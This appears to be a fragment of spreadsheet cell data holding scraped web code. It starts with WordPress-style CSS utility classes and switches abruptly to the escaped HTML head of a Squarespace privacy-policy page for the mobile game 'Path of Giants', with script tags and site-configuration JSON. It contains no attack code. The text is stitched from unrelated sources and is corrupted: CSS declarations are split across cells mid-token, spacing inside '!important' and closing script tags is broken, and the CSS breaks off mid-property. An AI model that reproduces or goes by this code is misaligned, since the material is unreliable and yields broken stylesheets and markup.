}
.ext-flex-grow-0 {
  flex-grow: 0 !</t>
  </si>
  <si>
    <t>important;
}
.ext-flex-grow {
  flex-grow: 1 !important;
}
.ext-list-none {
  list-style-type: none !important;
}
.ext-grid-cols-1 {
  grid-template-columns: repeat(1, minmax(0, 1fr)) ! important;
}
.ext-grid-cols-2 {
  grid-template-columns: repeat(2, minmax(0, 1fr)) ! important;
}
.ext-grid-cols-3 {
  grid-template-columns: repeat(3, minmax(0, 1fr)) !</t>
  </si>
  <si>
    <t>important;
}
.ext-grid-cols-4 {
  grid-template-columns: repeat(4, minmax(0, 1fr)) ! important;
}
.ext-grid-cols-5 {
  grid-template-columns: repeat(5, minmax(0, 1fr)) ! important;
}
.ext-grid-cols-6 {
  grid-template-columns: repeat(6, minmax(0, 1fr)) !</t>
  </si>
  <si>
    <t>important;
}
.ext-grid-cols-7 {
  grid-template-columns: repeat(7, minmax(0, 1fr)) ! important;
}
.ext-grid-cols-8 {
  grid-template-columns: repeat(8, minmax(0, 1fr)) ! important;
}
.ext-grid-cols-9 {
  grid-template-columns: repeat(9, minmax(0, 1fr)) !</t>
  </si>
  <si>
    <t>important;
}
.ext-grid-cols-10 {
  grid-template-columns: repeat(10, minmax(0, 1fr)) ! important;
}
.ext-grid-cols-11 {
  grid-template-columns: repeat(11, minmax(0, 1fr)) ! important;
}
.ext-grid-cols-12 {
  grid-template-columns: repeat(12, minmax(0, 1fr)) !</t>
  </si>
  <si>
    <t>important;
}
.ext-grid-cols-none {
  grid-template-columns: none !important;
}
.ext-grid-rows-1 {
  grid-template-rows: repeat(1, minmax(0, 1fr)) ! important;
}
.ext-grid-rows-2 {
  grid-template-rows: repeat(2, minmax(0, 1fr)) ! important;
}
.ext-grid-rows-3 {
  grid-template-rows: repeat(3, minmax(0, 1fr)) !</t>
  </si>
  <si>
    <t>important;
}
.ext-grid-rows-4 {
  grid-template-rows: repeat(4, minmax(0, 1fr)) ! important;
}
.ext-grid-rows-5 {
  grid-template-rows: repeat(5, minmax(0, 1fr)) ! important;
}
.ext-grid-rows-6 {
  grid-template-rows: repeat(6, minmax(0, 1fr)) !</t>
  </si>
  <si>
    <t>important;
}
.ext-grid-rows-none {
  grid-template-rows: none !important;
}
.ext-flex-row {
  flex-direction: row ! important;
}
.ext-flex-row-reverse {
  flex-direction: row-reverse ! important;
}
.ext-flex-col {
  flex-direction: column !</t>
  </si>
  <si>
    <t>important;
}
.ext-flex-col-reverse {
  flex-direction: column-reverse ! important;
}
.ext-flex-wrap {
  flex-wrap: wrap !important;
}
.ext-flex-wrap-reverse {
  flex-wrap: wrap-reverse ! important;
}
.ext-flex-nowrap {
  flex-wrap: nowrap !important;
}
.ext-items-start {
  align-items: flex-start !</t>
  </si>
  <si>
    <t>important;
}
.ext-items-end {
  align-items: flex-end ! important;
}
.ext-items-center {
  align-items: center !important;
}
.ext-items-baseline {
  align-items: baseline ! important;
}
.ext-items-stretch {
  align-items: stretch !</t>
  </si>
  <si>
    <t>important;
}
.ext-justify-start {
  justify-content: flex-start ! important;
}
.ext-justify-end {
  justify-content: flex-end ! important;
}
.ext-justify-center {
  justify-content: center !important;
}
.ext-justify-between {
  justify-content: space-between !important;
}
.ext-justify-around {
  justify-content: space-around !important;
}
.ext-justify-evenly {
  justify-content: space-evenly !important;
}
.ext-justify-items-start {
  justify-items: start !</t>
  </si>
  <si>
    <t>important;
}
.ext-justify-items-end {
  justify-items: end ! important;
}
.ext-justify-items-center {
  justify-items: center !important;
}
.ext-justify-items-stretch {
  justify-items: stretch ! important;
}
.ext-gap-0 {
  gap: 0 !important;
}
.ext-gap-base {
  gap: var(--wp--style--block-gap, 1.75rem) !</t>
  </si>
  <si>
    <t>important;
}
.ext-gap-lg {
  gap: var(--extendify--spacing--large, 3rem) ! important;
}
.ext-gap-x-0 {
  -moz-column-gap: 0 !important;
       column-gap: 0 !important;
}
.ext-gap-x-base {
  -moz-column-gap: var(--wp--style--block-gap, 1.75rem) ! important;
       column-gap: var(--wp--style--block-gap, 1.75rem) !</t>
  </si>
  <si>
    <t>important;
}
.ext-gap-x-lg {
  -moz-column-gap: var(--extendify--spacing--large, 3rem) ! important;
       column-gap: var(--extendify--spacing--large, 3rem) ! important;
}
.ext-gap-y-0 {
  row-gap: 0 !important;
}
.ext-gap-y-base {
  row-gap: var(--wp--style--block-gap, 1.75rem) !</t>
  </si>
  <si>
    <t>important;
}
.ext-gap-y-lg {
  row-gap: var(--extendify--spacing--large, 3rem) ! important;
}
.ext-justify-self-auto {
  justify-self: auto !important;
}
.ext-justify-self-start {
  justify-self: start ! important;
}
.ext-justify-self-end {
  justify-self: end !</t>
  </si>
  <si>
    <t>important;
}
.ext-justify-self-center {
  justify-self: center ! important;
}
.ext-justify-self-stretch {
  justify-self: stretch ! important;
}
.ext-rounded-none {
  border-radius: 0px !important;
}
.ext-rounded-full {
  border-radius: 9999px !important;
}
.ext-rounded-t-none {
  border-top-left-radius: 0px !important;
  border-top-right-radius: 0px !important;
}
.ext-rounded-t-full {
  border-top-left-radius: 9999px !important;
  border-top-right-radius: 9999px !important;
}
.ext-rounded-r-none {
  border-top-right-radius: 0px !important;
  border-bottom-right-radius: 0px !important;
}
.ext-rounded-r-full {
  border-top-right-radius: 9999px !important;
  border-bottom-right-radius: 9999px !important;
}
.ext-rounded-b-none {
  border-bottom-right-radius: 0px !</t>
  </si>
  <si>
    <t>important;
  border-bottom-left-radius: 0px !important;
}
.ext-rounded-b-full {
  border-bottom-right-radius: 9999px !important;
  border-bottom-left-radius: 9999px !important;
}
.ext-rounded-l-none {
  border-top-left-radius: 0px !important;
  border-bottom-left-radius: 0px !important;
}
.ext-rounded-l-full {
  border-top-left-radius: 9999px !important;
  border-bottom-left-radius: 9999px !important;
}
.ext-rounded-tl-none {
  border-top-left-radius: 0px !important;
}
.ext-rounded-tl-full {
  border-top-left-radius: 9999px !important;
}
.ext-rounded-tr-none {
  border-top-right-radius: 0px !important;
}
.ext-rounded-tr-full {
  border-top-right-radius: 9999px !important;
}
.ext-rounded-br-none {
  border-bottom-right-radius: 0px !important;
}
.ext-rounded-br-full {
  border-bottom-right-radius: 9999px !important;
}
.ext-rounded-bl-none {
  border-bottom-left-radius: 0px !important;
}
.ext-rounded-bl-full {
  border-bottom</t>
  </si>
  <si>
    <t>armadillo-prism-bptb --&gt;
&lt;base href=""&gt;
&lt;meta charset="utf-8" /&gt;
&lt;title&gt;Privacy Policy &amp;mdash; Path of Giants&lt;/title&gt;
&lt;meta http-equiv="Accept-CH" content="Sec-CH-UA-Platform-Version, Sec-CH-UA-Model" /&gt;&lt;link rel="shortcut icon" type="image/x-icon" href="https://images.squarespace-cdn.com/content/v1/5bdb60df1aef1daffa49bf4c/1541892004716-68MAB3KZ3KTQD5OJNQBO/favicon.ico?format=100w"/&gt;
&lt;link rel="canonical" href="https://www.pathofgiants.com/privacy-policy"/&gt;
&lt;meta property="og:site_name" content="Path of Giants"/&gt;
&lt;meta property="og:title" content="Privacy Policy &amp;mdash; Path of Giants"/&gt;
&lt;meta property="og:url" content="https://www.pathofgiants.com/privacy-policy"/&gt;
&lt;meta property="og:type" content="website"/&gt;
&lt;meta property="og:image" content="http://static1.squarespace.com/static/5bdb60df1aef1daffa49bf4c/t/5be767ab758d463fccb84454/1627841747512/00B-small.jpg?format=1500w"/&gt;
&lt;meta property="og:image:width" content="205"/&gt;
&lt;meta property="og:image:height" content="205"/&gt;
&lt;meta itemprop="name" content="Privacy Policy — Path of Giants"/&gt;
&lt;meta itemprop="url" content="https://www.pathofgiants.com/privacy-policy"/&gt;
&lt;meta itemprop="thumbnailUrl" content="http://static1.squarespace.com/static/5bdb60df1aef1daffa49bf4c/t/5be767ab758d463fccb84454/1627841747512/00B-small.jpg?format=1500w"/&gt;
&lt;link rel="image_src" href="http://static1.squarespace.com/static/5bdb60df1aef1daffa49bf4c/t/5be767ab758d463fccb84454/1627841747512/00B-small.jpg?format=1500w" /&gt;
&lt;meta itemprop="image" content="http://static1.squarespace.com/static/5bdb60df1aef1daffa49bf4c/t/5be767ab758d463fccb84454/1627841747512/00B-small.jpg?format=1500w"/&gt;
&lt;meta name="twitter:title" content="Privacy Policy — Path of Giants"/&gt;
 &lt;meta name="twitter:image" content="http://static1.squarespace.com/static/5bdb60df1aef1daffa49bf4c/t/5be767ab758d463fccb84454/1627841747512/00B-small.jpg?format=1500w"/&gt;
&lt;meta name="twitter:url" content="https://www.pathofgiants.com/privacy-policy"/&gt;
&lt;meta name="twitter:card" content="summary"/&gt;
&lt;meta name="description" content="" /&gt;
&lt;link rel="preconnect" href="https://images.squarespace-cdn.com"&gt;
&lt;script type="text/javascript" src="//use.typekit.net/ik/hLwqEM1NDavr4JkoOoztzoEXh9UmTdjXfVXhKVpNJptfeGS2fFHN4UJLFRbh52jhWDmKZeJhwescwAB8ZRBqjAZcjQbojcjXjU7qMPG0jW4ljAsTdeUzOWgk-WFlOA43ieJ0SaBujW48Sagyjh90jhNlOeBkdABq-AUCdku3Sc8DdPuKSYsKO1FUiABkZWF3jAF8OcFzdPUCdhFydeyzSabCSeBX-eNcZh8yd1sDOcFzdPUaiaS0jW4ljAsTdeUzOWgk-WFlOA43ieJ0SaBujW48Sagyjh90jhNlOYiaiko3jWsGdhZ1-AB0iYw0jhNlJ6Tl-AoTdhtlSY4zJ68ciWsuScIlSYbKJcZcOAizdhbl-emyZeUTdc9lihmKOWgkdkuRdhoqZAoDZAb7fbKyFsMMeMb6MKG4f4vuIMMjgPMfH6qJyB9bMs6IJMJ7fbRxmgMgeM96MKG4f54oIMIjgKMfH6qJ6m9bMs6YJMJ7fbKYmsMgeM66MKG4fJmmIMIj2KMfH6qJ689bMs6sJMJ7fbKSbUMfeMb6MKG4fHg2IMJjgPMfqMYQU5nzgb.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript"&gt;try{Typekit.load();}catch(e){}&lt;/script&gt;
&lt;link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css2?family=Abel:wght@400&amp;family=Amatic+SC:wght@400;700&amp;family=Amatica+SC:wght@700"&gt;
&lt;script type="text/javascript" crossorigin="anonymous" defer="defer" nomodule="nomodule" src="//assets.squarespace.com/@sqs/polyfiller/1.6/legacy.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" crossorigin="anonymous" defer="defer" src="//assets.squarespace.com/@sqs/polyfiller/1.6/modern.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript"&gt;SQUARESPACE_ROLLUPS = {};&lt;/script&gt;
&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js =</t>
  </si>
  <si>
    <t>["//assets.squarespace.com/universal/scripts-compressed/extract-css-runtime-3320227cb9e2aae8adcaf-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-extract_css_runtime');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/extract-css-runtime-3320227cb9e2aae8adcaf-min.en-US.js" defer &gt;&lt; /script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/extract-css-moment-js-vendor-5082e2dab696b020ac83a-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-extract_css_moment_js_vendor');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/extract-css-moment-js-vendor-5082e2dab696b020ac83a-min.en-US.js" defer &gt;&lt;</t>
  </si>
  <si>
    <t>/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/cldr-resource-pack-56fdc0b6309d3f37f75e8-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-cldr_resource_pack');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/cldr-resource-pack-56fdc0b6309d3f37f75e8-min.en-US.js" defer &gt;&lt; /script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js =</t>
  </si>
  <si>
    <t>["//assets.squarespace.com/universal/scripts-compressed/common-vendors-stable-dade9d616ff90ebf99b1d-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-common_vendors_stable');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/common-vendors-stable-dade9d616ff90ebf99b1d-min.en-US.js" defer &gt;&lt; /script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/common-vendors-fb8be9b2d78e372bb6e06-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-common_vendors');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/common-vendors-fb8be9b2d78e372bb6e06-min.en-US.js" defer &gt;&lt;</t>
  </si>
  <si>
    <t>/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/common-2f15b9a72955cf722b96d-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-common');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/common-2f15b9a72955cf722b96d-min.en-US.js" defer &gt;&lt; /script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js =</t>
  </si>
  <si>
    <t>["//assets.squarespace.com/universal/scripts-compressed/performance-bb5721e73cd845bac5d20-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-performance');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/performance-bb5721e73cd845bac5d20-min.en-US.js" defer &gt;&lt;/script&gt;&lt;script data-name="static-context"&gt;Static = window. Static || {}; Static.SQUARESPACE_CONTEXT = {"facebookAppId":"314192535267336","facebookApiVersion":"v6.0","rollups":{"squarespace-announcement-bar":{"js":"//assets.squarespace.com/universal/scripts-compressed/announcement-bar-cfb9ca391e5434cccb495-min.en-US.js"},"squarespace-audio-player":{"css":"//assets.squarespace.com/universal/styles-compressed/audio-player-702bf18174efe0acaa8ce-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/audio-player-d61ee22e7c56cbfe6bf6f-min.en-US.js"},"squarespace-blog-collection-list":{"css":"//assets.squarespace.com/universal/styles-compressed/blog-collection-list-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/blog-collection-list-44ab3d6f12cddbd366f28-min.en-US.js"},"squarespace-calendar-block-renderer":{"css":"//assets.squarespace.com/universal/styles-compressed/calendar-block-renderer-49c4a5f3dae67a728e3f4-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/calendar-block-renderer-6f20ca9fe0574949433f3-min.en-US.js"},"squarespace-chartjs-helpers":{"css":"//assets.squarespace.com/universal/styles-compressed/chartjs-helpers-53c004ac7d4bde1c92e38-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/chartjs-helpers-aff2d23104600df085fdd-min.en-US.js"},"squarespace-comments":{"css":"//assets.squarespace.com/universal/styles-compressed/comments-cb7553e34a4da425817c4-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/comments-8a4bd0618556454361bcc-min.en-US.js"},"squarespace-dialog":{"css":"//assets.squarespace.com/universal/styles-compressed/dialog-89b254b5c87045b9e1360-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/dialog-a03ec6aa3252c6c79a13c-min.en-US.js"},"squarespace-events-collection":{"css":"//assets.squarespace.com/universal/styles-compressed/events-collection-49c4a5f3dae67a728e3f4-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/events-collection-9c7837f8e8c7ba99a4aa2-min.en-US.js"},"squarespace-form-rendering-utils":{"js":"//assets.squarespace.com/universal/scripts-compressed/form-rendering-utils-3a18a40d3a28179a79fe4-min.en-US.js"},"squarespace-forms":{"css":"//assets.squarespace.com/universal/styles-compressed/forms-4a16a8a8c965386db2173-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/forms-97452adf98b259487f44f-min.en-US.js"},"squarespace-gallery-collection-list":{"css":"//assets.squarespace.com/universal/styles-compressed/gallery-collection-list-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/gallery-collection-list-ccf378030ccbdb6e9f20a-min.en-US.js"},"squarespace-image-zoom":{"css":"//assets.squarespace.com/universal/styles-compressed/image-zoom-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/image-zoom-95bf63ca6dc7a85183665-min.en-US.js"},"squarespace-pinterest":{"css":"//assets.squarespace.com/universal/styles-compressed/pinterest-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/pinterest-a4e9fe29fb0c5c424e870-min.en-US.js"},"squarespace-popup-overlay":{"css":"//assets.squarespace.com/universal/styles-compressed/popup-overlay-948192219c3257f767ec5-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/popup-overlay-dd96b4be33459afc5aed8-min.en-US.js"},"squarespace-product-quick-view":{"css":"//assets.squarespace.com/universal/styles-compressed/product-quick-view-4a16a8a8c965386db2173-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/product-quick-view-f0768c380cf00ec103fd6-min.en-US.js"},"squarespace-products-collection-item-v2":{"css":"//assets.squarespace.com/universal/styles-compressed/products-collection-item-v2-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/products-collection-item-v2-4d72177710b16966fd304-min.en-US.js"},"squarespace-products-collection-list-v2":{"css":"//assets.squarespace.com/universal/styles-compressed/products-collection-list-v2-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/products-collection-list-v2-86cb9526983c4269307f0-min.en-US.js"},"squarespace-search-page":{"css":"//assets.squarespace.com/universal/styles-compressed/search-page-9d0a55de1efafbb9218e1-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/search-page-af841a4de517d1960ffe3-min.en-US.js"},"squarespace-search-preview":{"js":"//assets.squarespace.com/universal/scripts-compressed/search-preview-8c25e422640fd7271eda1-min.en-US.js"},"squarespace-simple-liking":{"css":"//assets.squarespace.com/universal/styles-compressed/simple-liking-ef94529873378652e6e86-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/simple-liking-eec025f782ea0a61910bd-min.en-US.js"},"squarespace-social-buttons":{"css":"//assets.squarespace.com/universal/styles-compressed/social-buttons-1f18e025ea682ade6293a-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/social-buttons-a2f5c0c402abbb48429cb-min.en-US.js"},"squarespace-tourdates":{"css":"//assets.squarespace.com/universal/styles-compressed/tourdates-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/tourdates-a1067e56130bfa7beb364-min.en-US.js"},"squarespace-website-overlays-manager":{"css":"//assets.squarespace.com/universal/styles-compressed/website-overlays-manager-7cecc648f858e6f692130-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/website-overlays-manager-7bf44765a935060ae0761-min.en-US.js"}},"pageType":2,"website":{"id":"5bdb60df1aef1daffa49bf4c","identifier":"armadillo-prism-bptb","websiteType":1,"contentModifiedOn":1660052166128,"cloneable":false,"hasBeenCloneable":false,"siteStatus":{},"language":"en-US","timeZone":"America/Vancouver","machineTimeZoneOffset":-25200000,"timeZoneOffset":-25200000,"timeZoneAbbr":"PDT","siteTitle":"Path of Giants","fullSiteTitle":"Privacy Policy \u2014 Path of Giants","siteTagLine":"A Mobile Puzzle Game","siteDescription":"","socialLogoImageId":"5be767ab758d463fccb84454","shareButtonOptions":{"2":true,"1":true,"7":true},"socialLogoImageUrl":"//images.squarespace-cdn.com/content/v1/5bdb60df1aef1daffa49bf4c/1541892011704-WK4AEYROBPROJ2QBVPZ7/00B-small.jpg","authenticUrl":"https://www.pathofgiants.com","internalUrl":"https://armadillo-prism-bptb.squarespace.com","baseUrl":"https://www.pathofgiants.com","primaryDomain":"www.pathofgiants.com","sslSetting":3,"isHstsEnabled":false,"socialAccounts":[{"serviceId":4,"userId":"1008102092718739456","userName":"pathofgiants","screenname":"pathofgiants","addedOn":1541274644277,"profileUrl":"https://twitter.com/journey_bound","iconUrl":"http://abs.twimg.com/sticky/default_profile_images/default_profile_normal.png","collectionId":"5bddfc1475f9ee8aad3c4f1d","iconEnabled":true,"serviceName":"twitter"},{"serviceId":2,"userId":"10156140707820910","screenname":"Hana Halan","addedOn":1541968491924,"profileUrl":"https://www.facebook.com/journeyboundgames","iconUrl":"http://graph.facebook.com/10156140707820910/picture?type=square","metaData":{"service":"facebook"},"iconEnabled":true,"serviceName":"facebook"},{"serviceId":10,"userId":"8799228574","userName":"journeyboundgames","screenname":"Journey Bound Games","addedOn":1541883178365,"profileUrl":"http://instagram.com/journeyboundgames","iconUrl":"https://scontent.cdninstagram.com/vp/ad41e8f0c9b4c6fa3dc0d63a562a1fcd/5C71ED27/t51.2885-19/s150x150/43913602_486962095129792_3453724210784894976_n.jpg","collectionId":"5be7452ada02bce8e1ef5f20","iconEnabled":true,"serviceName":"instagram"},{"serviceId":69,"screenname":"YouTube","addedOn":1573156513338,"profileUrl":"https://www.youtube.com/channel/UCTbKNsMSoC4HyiDqpkpOzkg","iconEnabled":true,"serviceName":"youtube-unauth"}],"typekitId":"","statsMigrated":false,"imageMetadataProcessingEnabled":false,"screenshotId":"42cb8b4e4d8be774e13ef17de73a58f7028a8d7bc18dbb1b09bea1bbaeea50bf","captchaSettings":{"enabledForDonations":false},"showOwnerLogin":false},"websiteSettings":{"id":"5bdb60df1aef1daffa49bf4e","websiteId":"5bdb60df1aef1daffa49bf4c","type":"Business","subjects":[],"country":"CA","state":"BC","simpleLikingEnabled":true,"popupOverlaySettings":{"style":1,"enabledPages":[]},"commentLikesAllowed":true,"commentAnonAllowed":true,"commentThreaded":true,"commentApprovalRequired":false,"commentAvatarsOn":true,"commentSortType":2,"commentFlagThreshold":0,"commentFlagsAllowed":true,"commentEnableByDefault":true,"commentDisableAfterDaysDefault":0,"disqusShortname":"","commentsEnabled":false,"storeSettings":{"returnPolicy":null,"termsOfService":null,"privacyPolicy":null,"expressCheckout":false,"continueShoppingLinkUrl":"/","useLightCart":false,"showNoteField":false,"shippingCountryDefaultValue":"US","billToShippingDefaultValue":false,"showShippingPhoneNumber":true,"isShippingPhoneRequired":false,"showBillingPhoneNumber":true,"isBillingPhoneRequired":false,"currenciesSupported":["CHF","HKD","MXN","EUR","DKK","USD","CAD","MYR","NOK","THB","AUD","SGD","ILS","PLN","GBP","CZK","SEK","NZD","PHP","RUB"],"defaultCurrency":"USD","selectedCurrency":"USD","measurementStandard":1,"showCustomCheckoutForm":false,"checkoutPageMarketingOptInEnabled":false,"enableMailingListOptInByDefault":false,"sameAsRetailLocation":false,"merchandisingSettings":{"scarcityEnabledOnProductItems":false,"scarcityEnabledOnProductBlocks":false,"scarcityMessageType":"DEFAULT_SCARCITY_MESSAGE","scarcityThreshold":10,"multipleQuantityAllowedForServices":true,"restockNotificationsEnabled":false,"restockNotificationsMailingListSignUpEnabled":false,"relatedProductsEnabled":false,"relatedProductsOrdering":"random","soldOutVariantsDropdownDisabled":false,"productComposerOptedIn":false,"productComposerABTestOptedOut":false,"productReviewsEnabled":false,"displayImportedProductReviewsEnabled":false,"hasOptedToCollectNativeReviews":false},"isLive":false,"multipleQuantityAllowedForServices":true},"useEscapeKeyToLogin":true,"ssBadgeType":1,"ssBadgePosition":4,"ssBadgeVisibility":1,"ssBadgeDevices":1,"pinterestOverlayOptions":{"mode":"disabled"},"ampEnabled":false},"cookieSettings":{"isCookieBannerEnabled":false,"isRestrictiveCookiePolicyEnabled":true,"isRestrictiveCookiePolicyAbsolute":true,"cookieBannerText":"&lt;p class=\"\"&gt;We use cookies to provide you with a great experience and to help our website run effectively.</t>
  </si>
  <si>
    <t>Do you agree to activate the use of our cookies?&lt;/p&gt;","cookieBannerTheme":"DARK","cookieBannerVariant":"POPUP","cookieBannerPosition":"BOTTOM_LEFT","cookieBannerCtaVariant":"BUTTON","cookieBannerCtaText":"YES","cookieBannerAcceptType":"OPT_IN"},"websiteCloneable":false,"collection":{"title":"Privacy Policy","id":"5cfc560a2b756600012b1adc","fullUrl":"/privacy-policy","type":10,"permissionType":1},"subscribed":false,"appDomain":"squarespace.com","templateTweakable":true,"tweakJSON":{"aspect-ratio":"Auto","gallery-arrow-style":"No Background","gallery-aspect-ratio":"3:2 Standard","gallery-auto-crop":"true","gallery-autoplay":"false","gallery-design":"Slideshow","gallery-info-overlay":"Show on Hover","gallery-loop":"false","gallery-navigation":"Bullets","gallery-show-arrows":"true","gallery-transitions":"Fade","galleryArrowBackground":"rgba(34,34,34,1)","galleryArrowColor":"rgba(255,255,255,1)","galleryAutoplaySpeed":"3","galleryCircleColor":"rgba(255,255,255,1)","galleryInfoBackground":"rgba(0, 0, 0, .7)","galleryThumbnailSize":"100px","gridSize":"350px","gridSpacing":"20px","tweak-blog-list-columns":"3","tweak-blog-list-item-image-aspect-ratio-grid":"4:3 Four-Three","tweak-blog-list-item-image-aspect-ratio-stacked":"1:1 Square","tweak-blog-list-item-image-show":"true","tweak-blog-list-spacing":"50px","tweak-blog-list-style":"Grid","tweak-footer-layout":"Stacked","tweak-header-bottom-overlay-on-index-gallery":"false","tweak-index-gallery-apply-bottom-spacing":"true","tweak-index-gallery-autoplay-duration":"6","tweak-index-gallery-autoplay-enable":"true","tweak-index-gallery-fixed-height":"true","tweak-index-gallery-height":"39vh","tweak-index-gallery-indicators":"Dots","tweak-index-gallery-layout":"Slideshow","tweak-index-gallery-transition":"Slide","tweak-index-gallery-transition-duration":"652","tweak-index-nav-position":"Right","tweak-index-page-apply-bottom-spacing":"false","tweak-index-page-fullscreen":"First Page Only","tweak-index-page-min-height":"71vh","tweak-mobile-breakpoint":"640px","tweak-overlay-parallax-enabled":"false","tweak-overlay-parallax-new-math":"false","tweak-product-item-image-zoom-factor":"2","tweak-product-list-item-hover-behavior":"Show Alternate Image","tweak-product-list-items-per-row":"4","tweak-related-products-items-per-row":"3","tweak-related-products-title-spacing":"50px","tweak-site-ajax-loading-enable":"true","tweak-site-border-show":"false","tweak-site-border-width":"1px"},"templateId":"55f0aac0e4b0f0a5b7e0b22e","templateVersion":"7","pageFeatures":[1,2,4],"gmRenderKey":"QUl6YVN5Q0JUUk9xNkx1dkZfSUUxcjQ2LVQ0QWVUU1YtMGQ3bXk4","templateScriptsRootUrl":"https://static1.squarespace.com/static/ta/55f0a9b0e4b0f3eb70352f6d/349/scripts/","betaFeatureFlags":["is_feature_gate_refresh_enabled","scripts_defer","campaigns_new_image_layout_picker","crm_waitlist_enforce_recaptcha_v3_enterprise","block_annotations_revamp","campaigns_import_discounts","campaigns_thumbnail_layout","crm_default_newsletter_block_to_campaigns","commerce_site_visitor_metrics","commerce_clearpay","campaigns_new_subscriber_search","marketing_landing_page","campaigns_asset_picker","order_status_page_checkout_landing_enabled","crm_enforce_recaptcha_v3_enterprise","crm_retention_segment","accounting_orders_sync","campaigns_global_uc_ab","multilingual_transactional_emails","fluid_engine_clean_up_grid_contextual_change","campaigns_show_featured_templates","campaigns_discount_section_in_blasts","nested_categories_migration_enabled","fluid_engine","customer_account_creation_recaptcha","campaigns_content_editing_survey","member_areas_spanish_interviews","commerce_order_status_access","site_user_email_change","campaigns_discount_section_in_automations","viewer-role-contributor-invites","commerce_etsy_shipping_import","commerce_restock_notifications","commerce_etsy_product_import","member_areas_provisioning_service","member_areas_schedule_interview","crm_remove_subscriber","crm_enable_recaptcha_v3_enterprise","background_art_onboarding","send_local_pickup_ready_email","customer_accounts_email_verification"],"videoAssetsFeatureFlags":["mux-data-video-collection","mux-data-video-block","mux-data-course-collection"],"impersonatedSession":false,"tzData":{"zones":[[-480,"Canada","P%sT",null]],"rules":{"Canada":[[1974,2006,null,"Oct","lastSun","2:00","0","S"],[1987,2006,null,"Apr","Sun&gt;=1","2:00","1:00","D"],[2007,"max",null,"Mar","Sun&gt;=8","2:00","1:00","D"],[2007,"max",null,"Nov","Sun&gt;=1","2:00","0","S"]]}},"showAnnouncementBar":false,"recaptchaEnterpriseContext":{"recaptchaEnterpriseSiteKey":"6LdDFQwjAAAAAPigEvvPgEVbb7QBm-TkVJdDTlAv"},"i18nContext":{"timeZoneData":{"id":"America/Vancouver","name":"Pacific Time"}}};&lt;/script&gt;&lt;script type="module"&gt;SquarespaceFonts.loadViaContext(); Squarespace.load(window);&lt;/script&gt;
&lt;script data-sqs-type="imageloader-bootstrapper" type="module"&gt;if(window. ImageLoader) window.ImageLoader.bootstrap({}, document);&lt;/script&gt;
&lt;script type="module"&gt;Squarespace.afterBodyLoad(Y);&lt;/script&gt;
&lt;script type="application/ld+json"&gt;{"url":"https://www.pathofgiants.com","name":"Path of Giants","description":"","@context":"http://schema.org","@type":"WebSite"}&lt;/script&gt;&lt;link rel="stylesheet" type="text/css" href="https://static1.squarespace.com/static/sitecss/5bdb60df1aef1daffa49bf4c/199/55f0aac0e4b0f0a5b7e0b22e/5be736262b6a28e89835528e/349/site.css"/&gt;&lt;meta name="ROBOTS" content="NOINDEX"&gt;
&lt;script&gt;Static. COOKIE_BANNER_CAPABLE = true;&lt;/script&gt;
&lt;!-- End of Squarespace Headers --&gt;
  &lt;/head&gt;
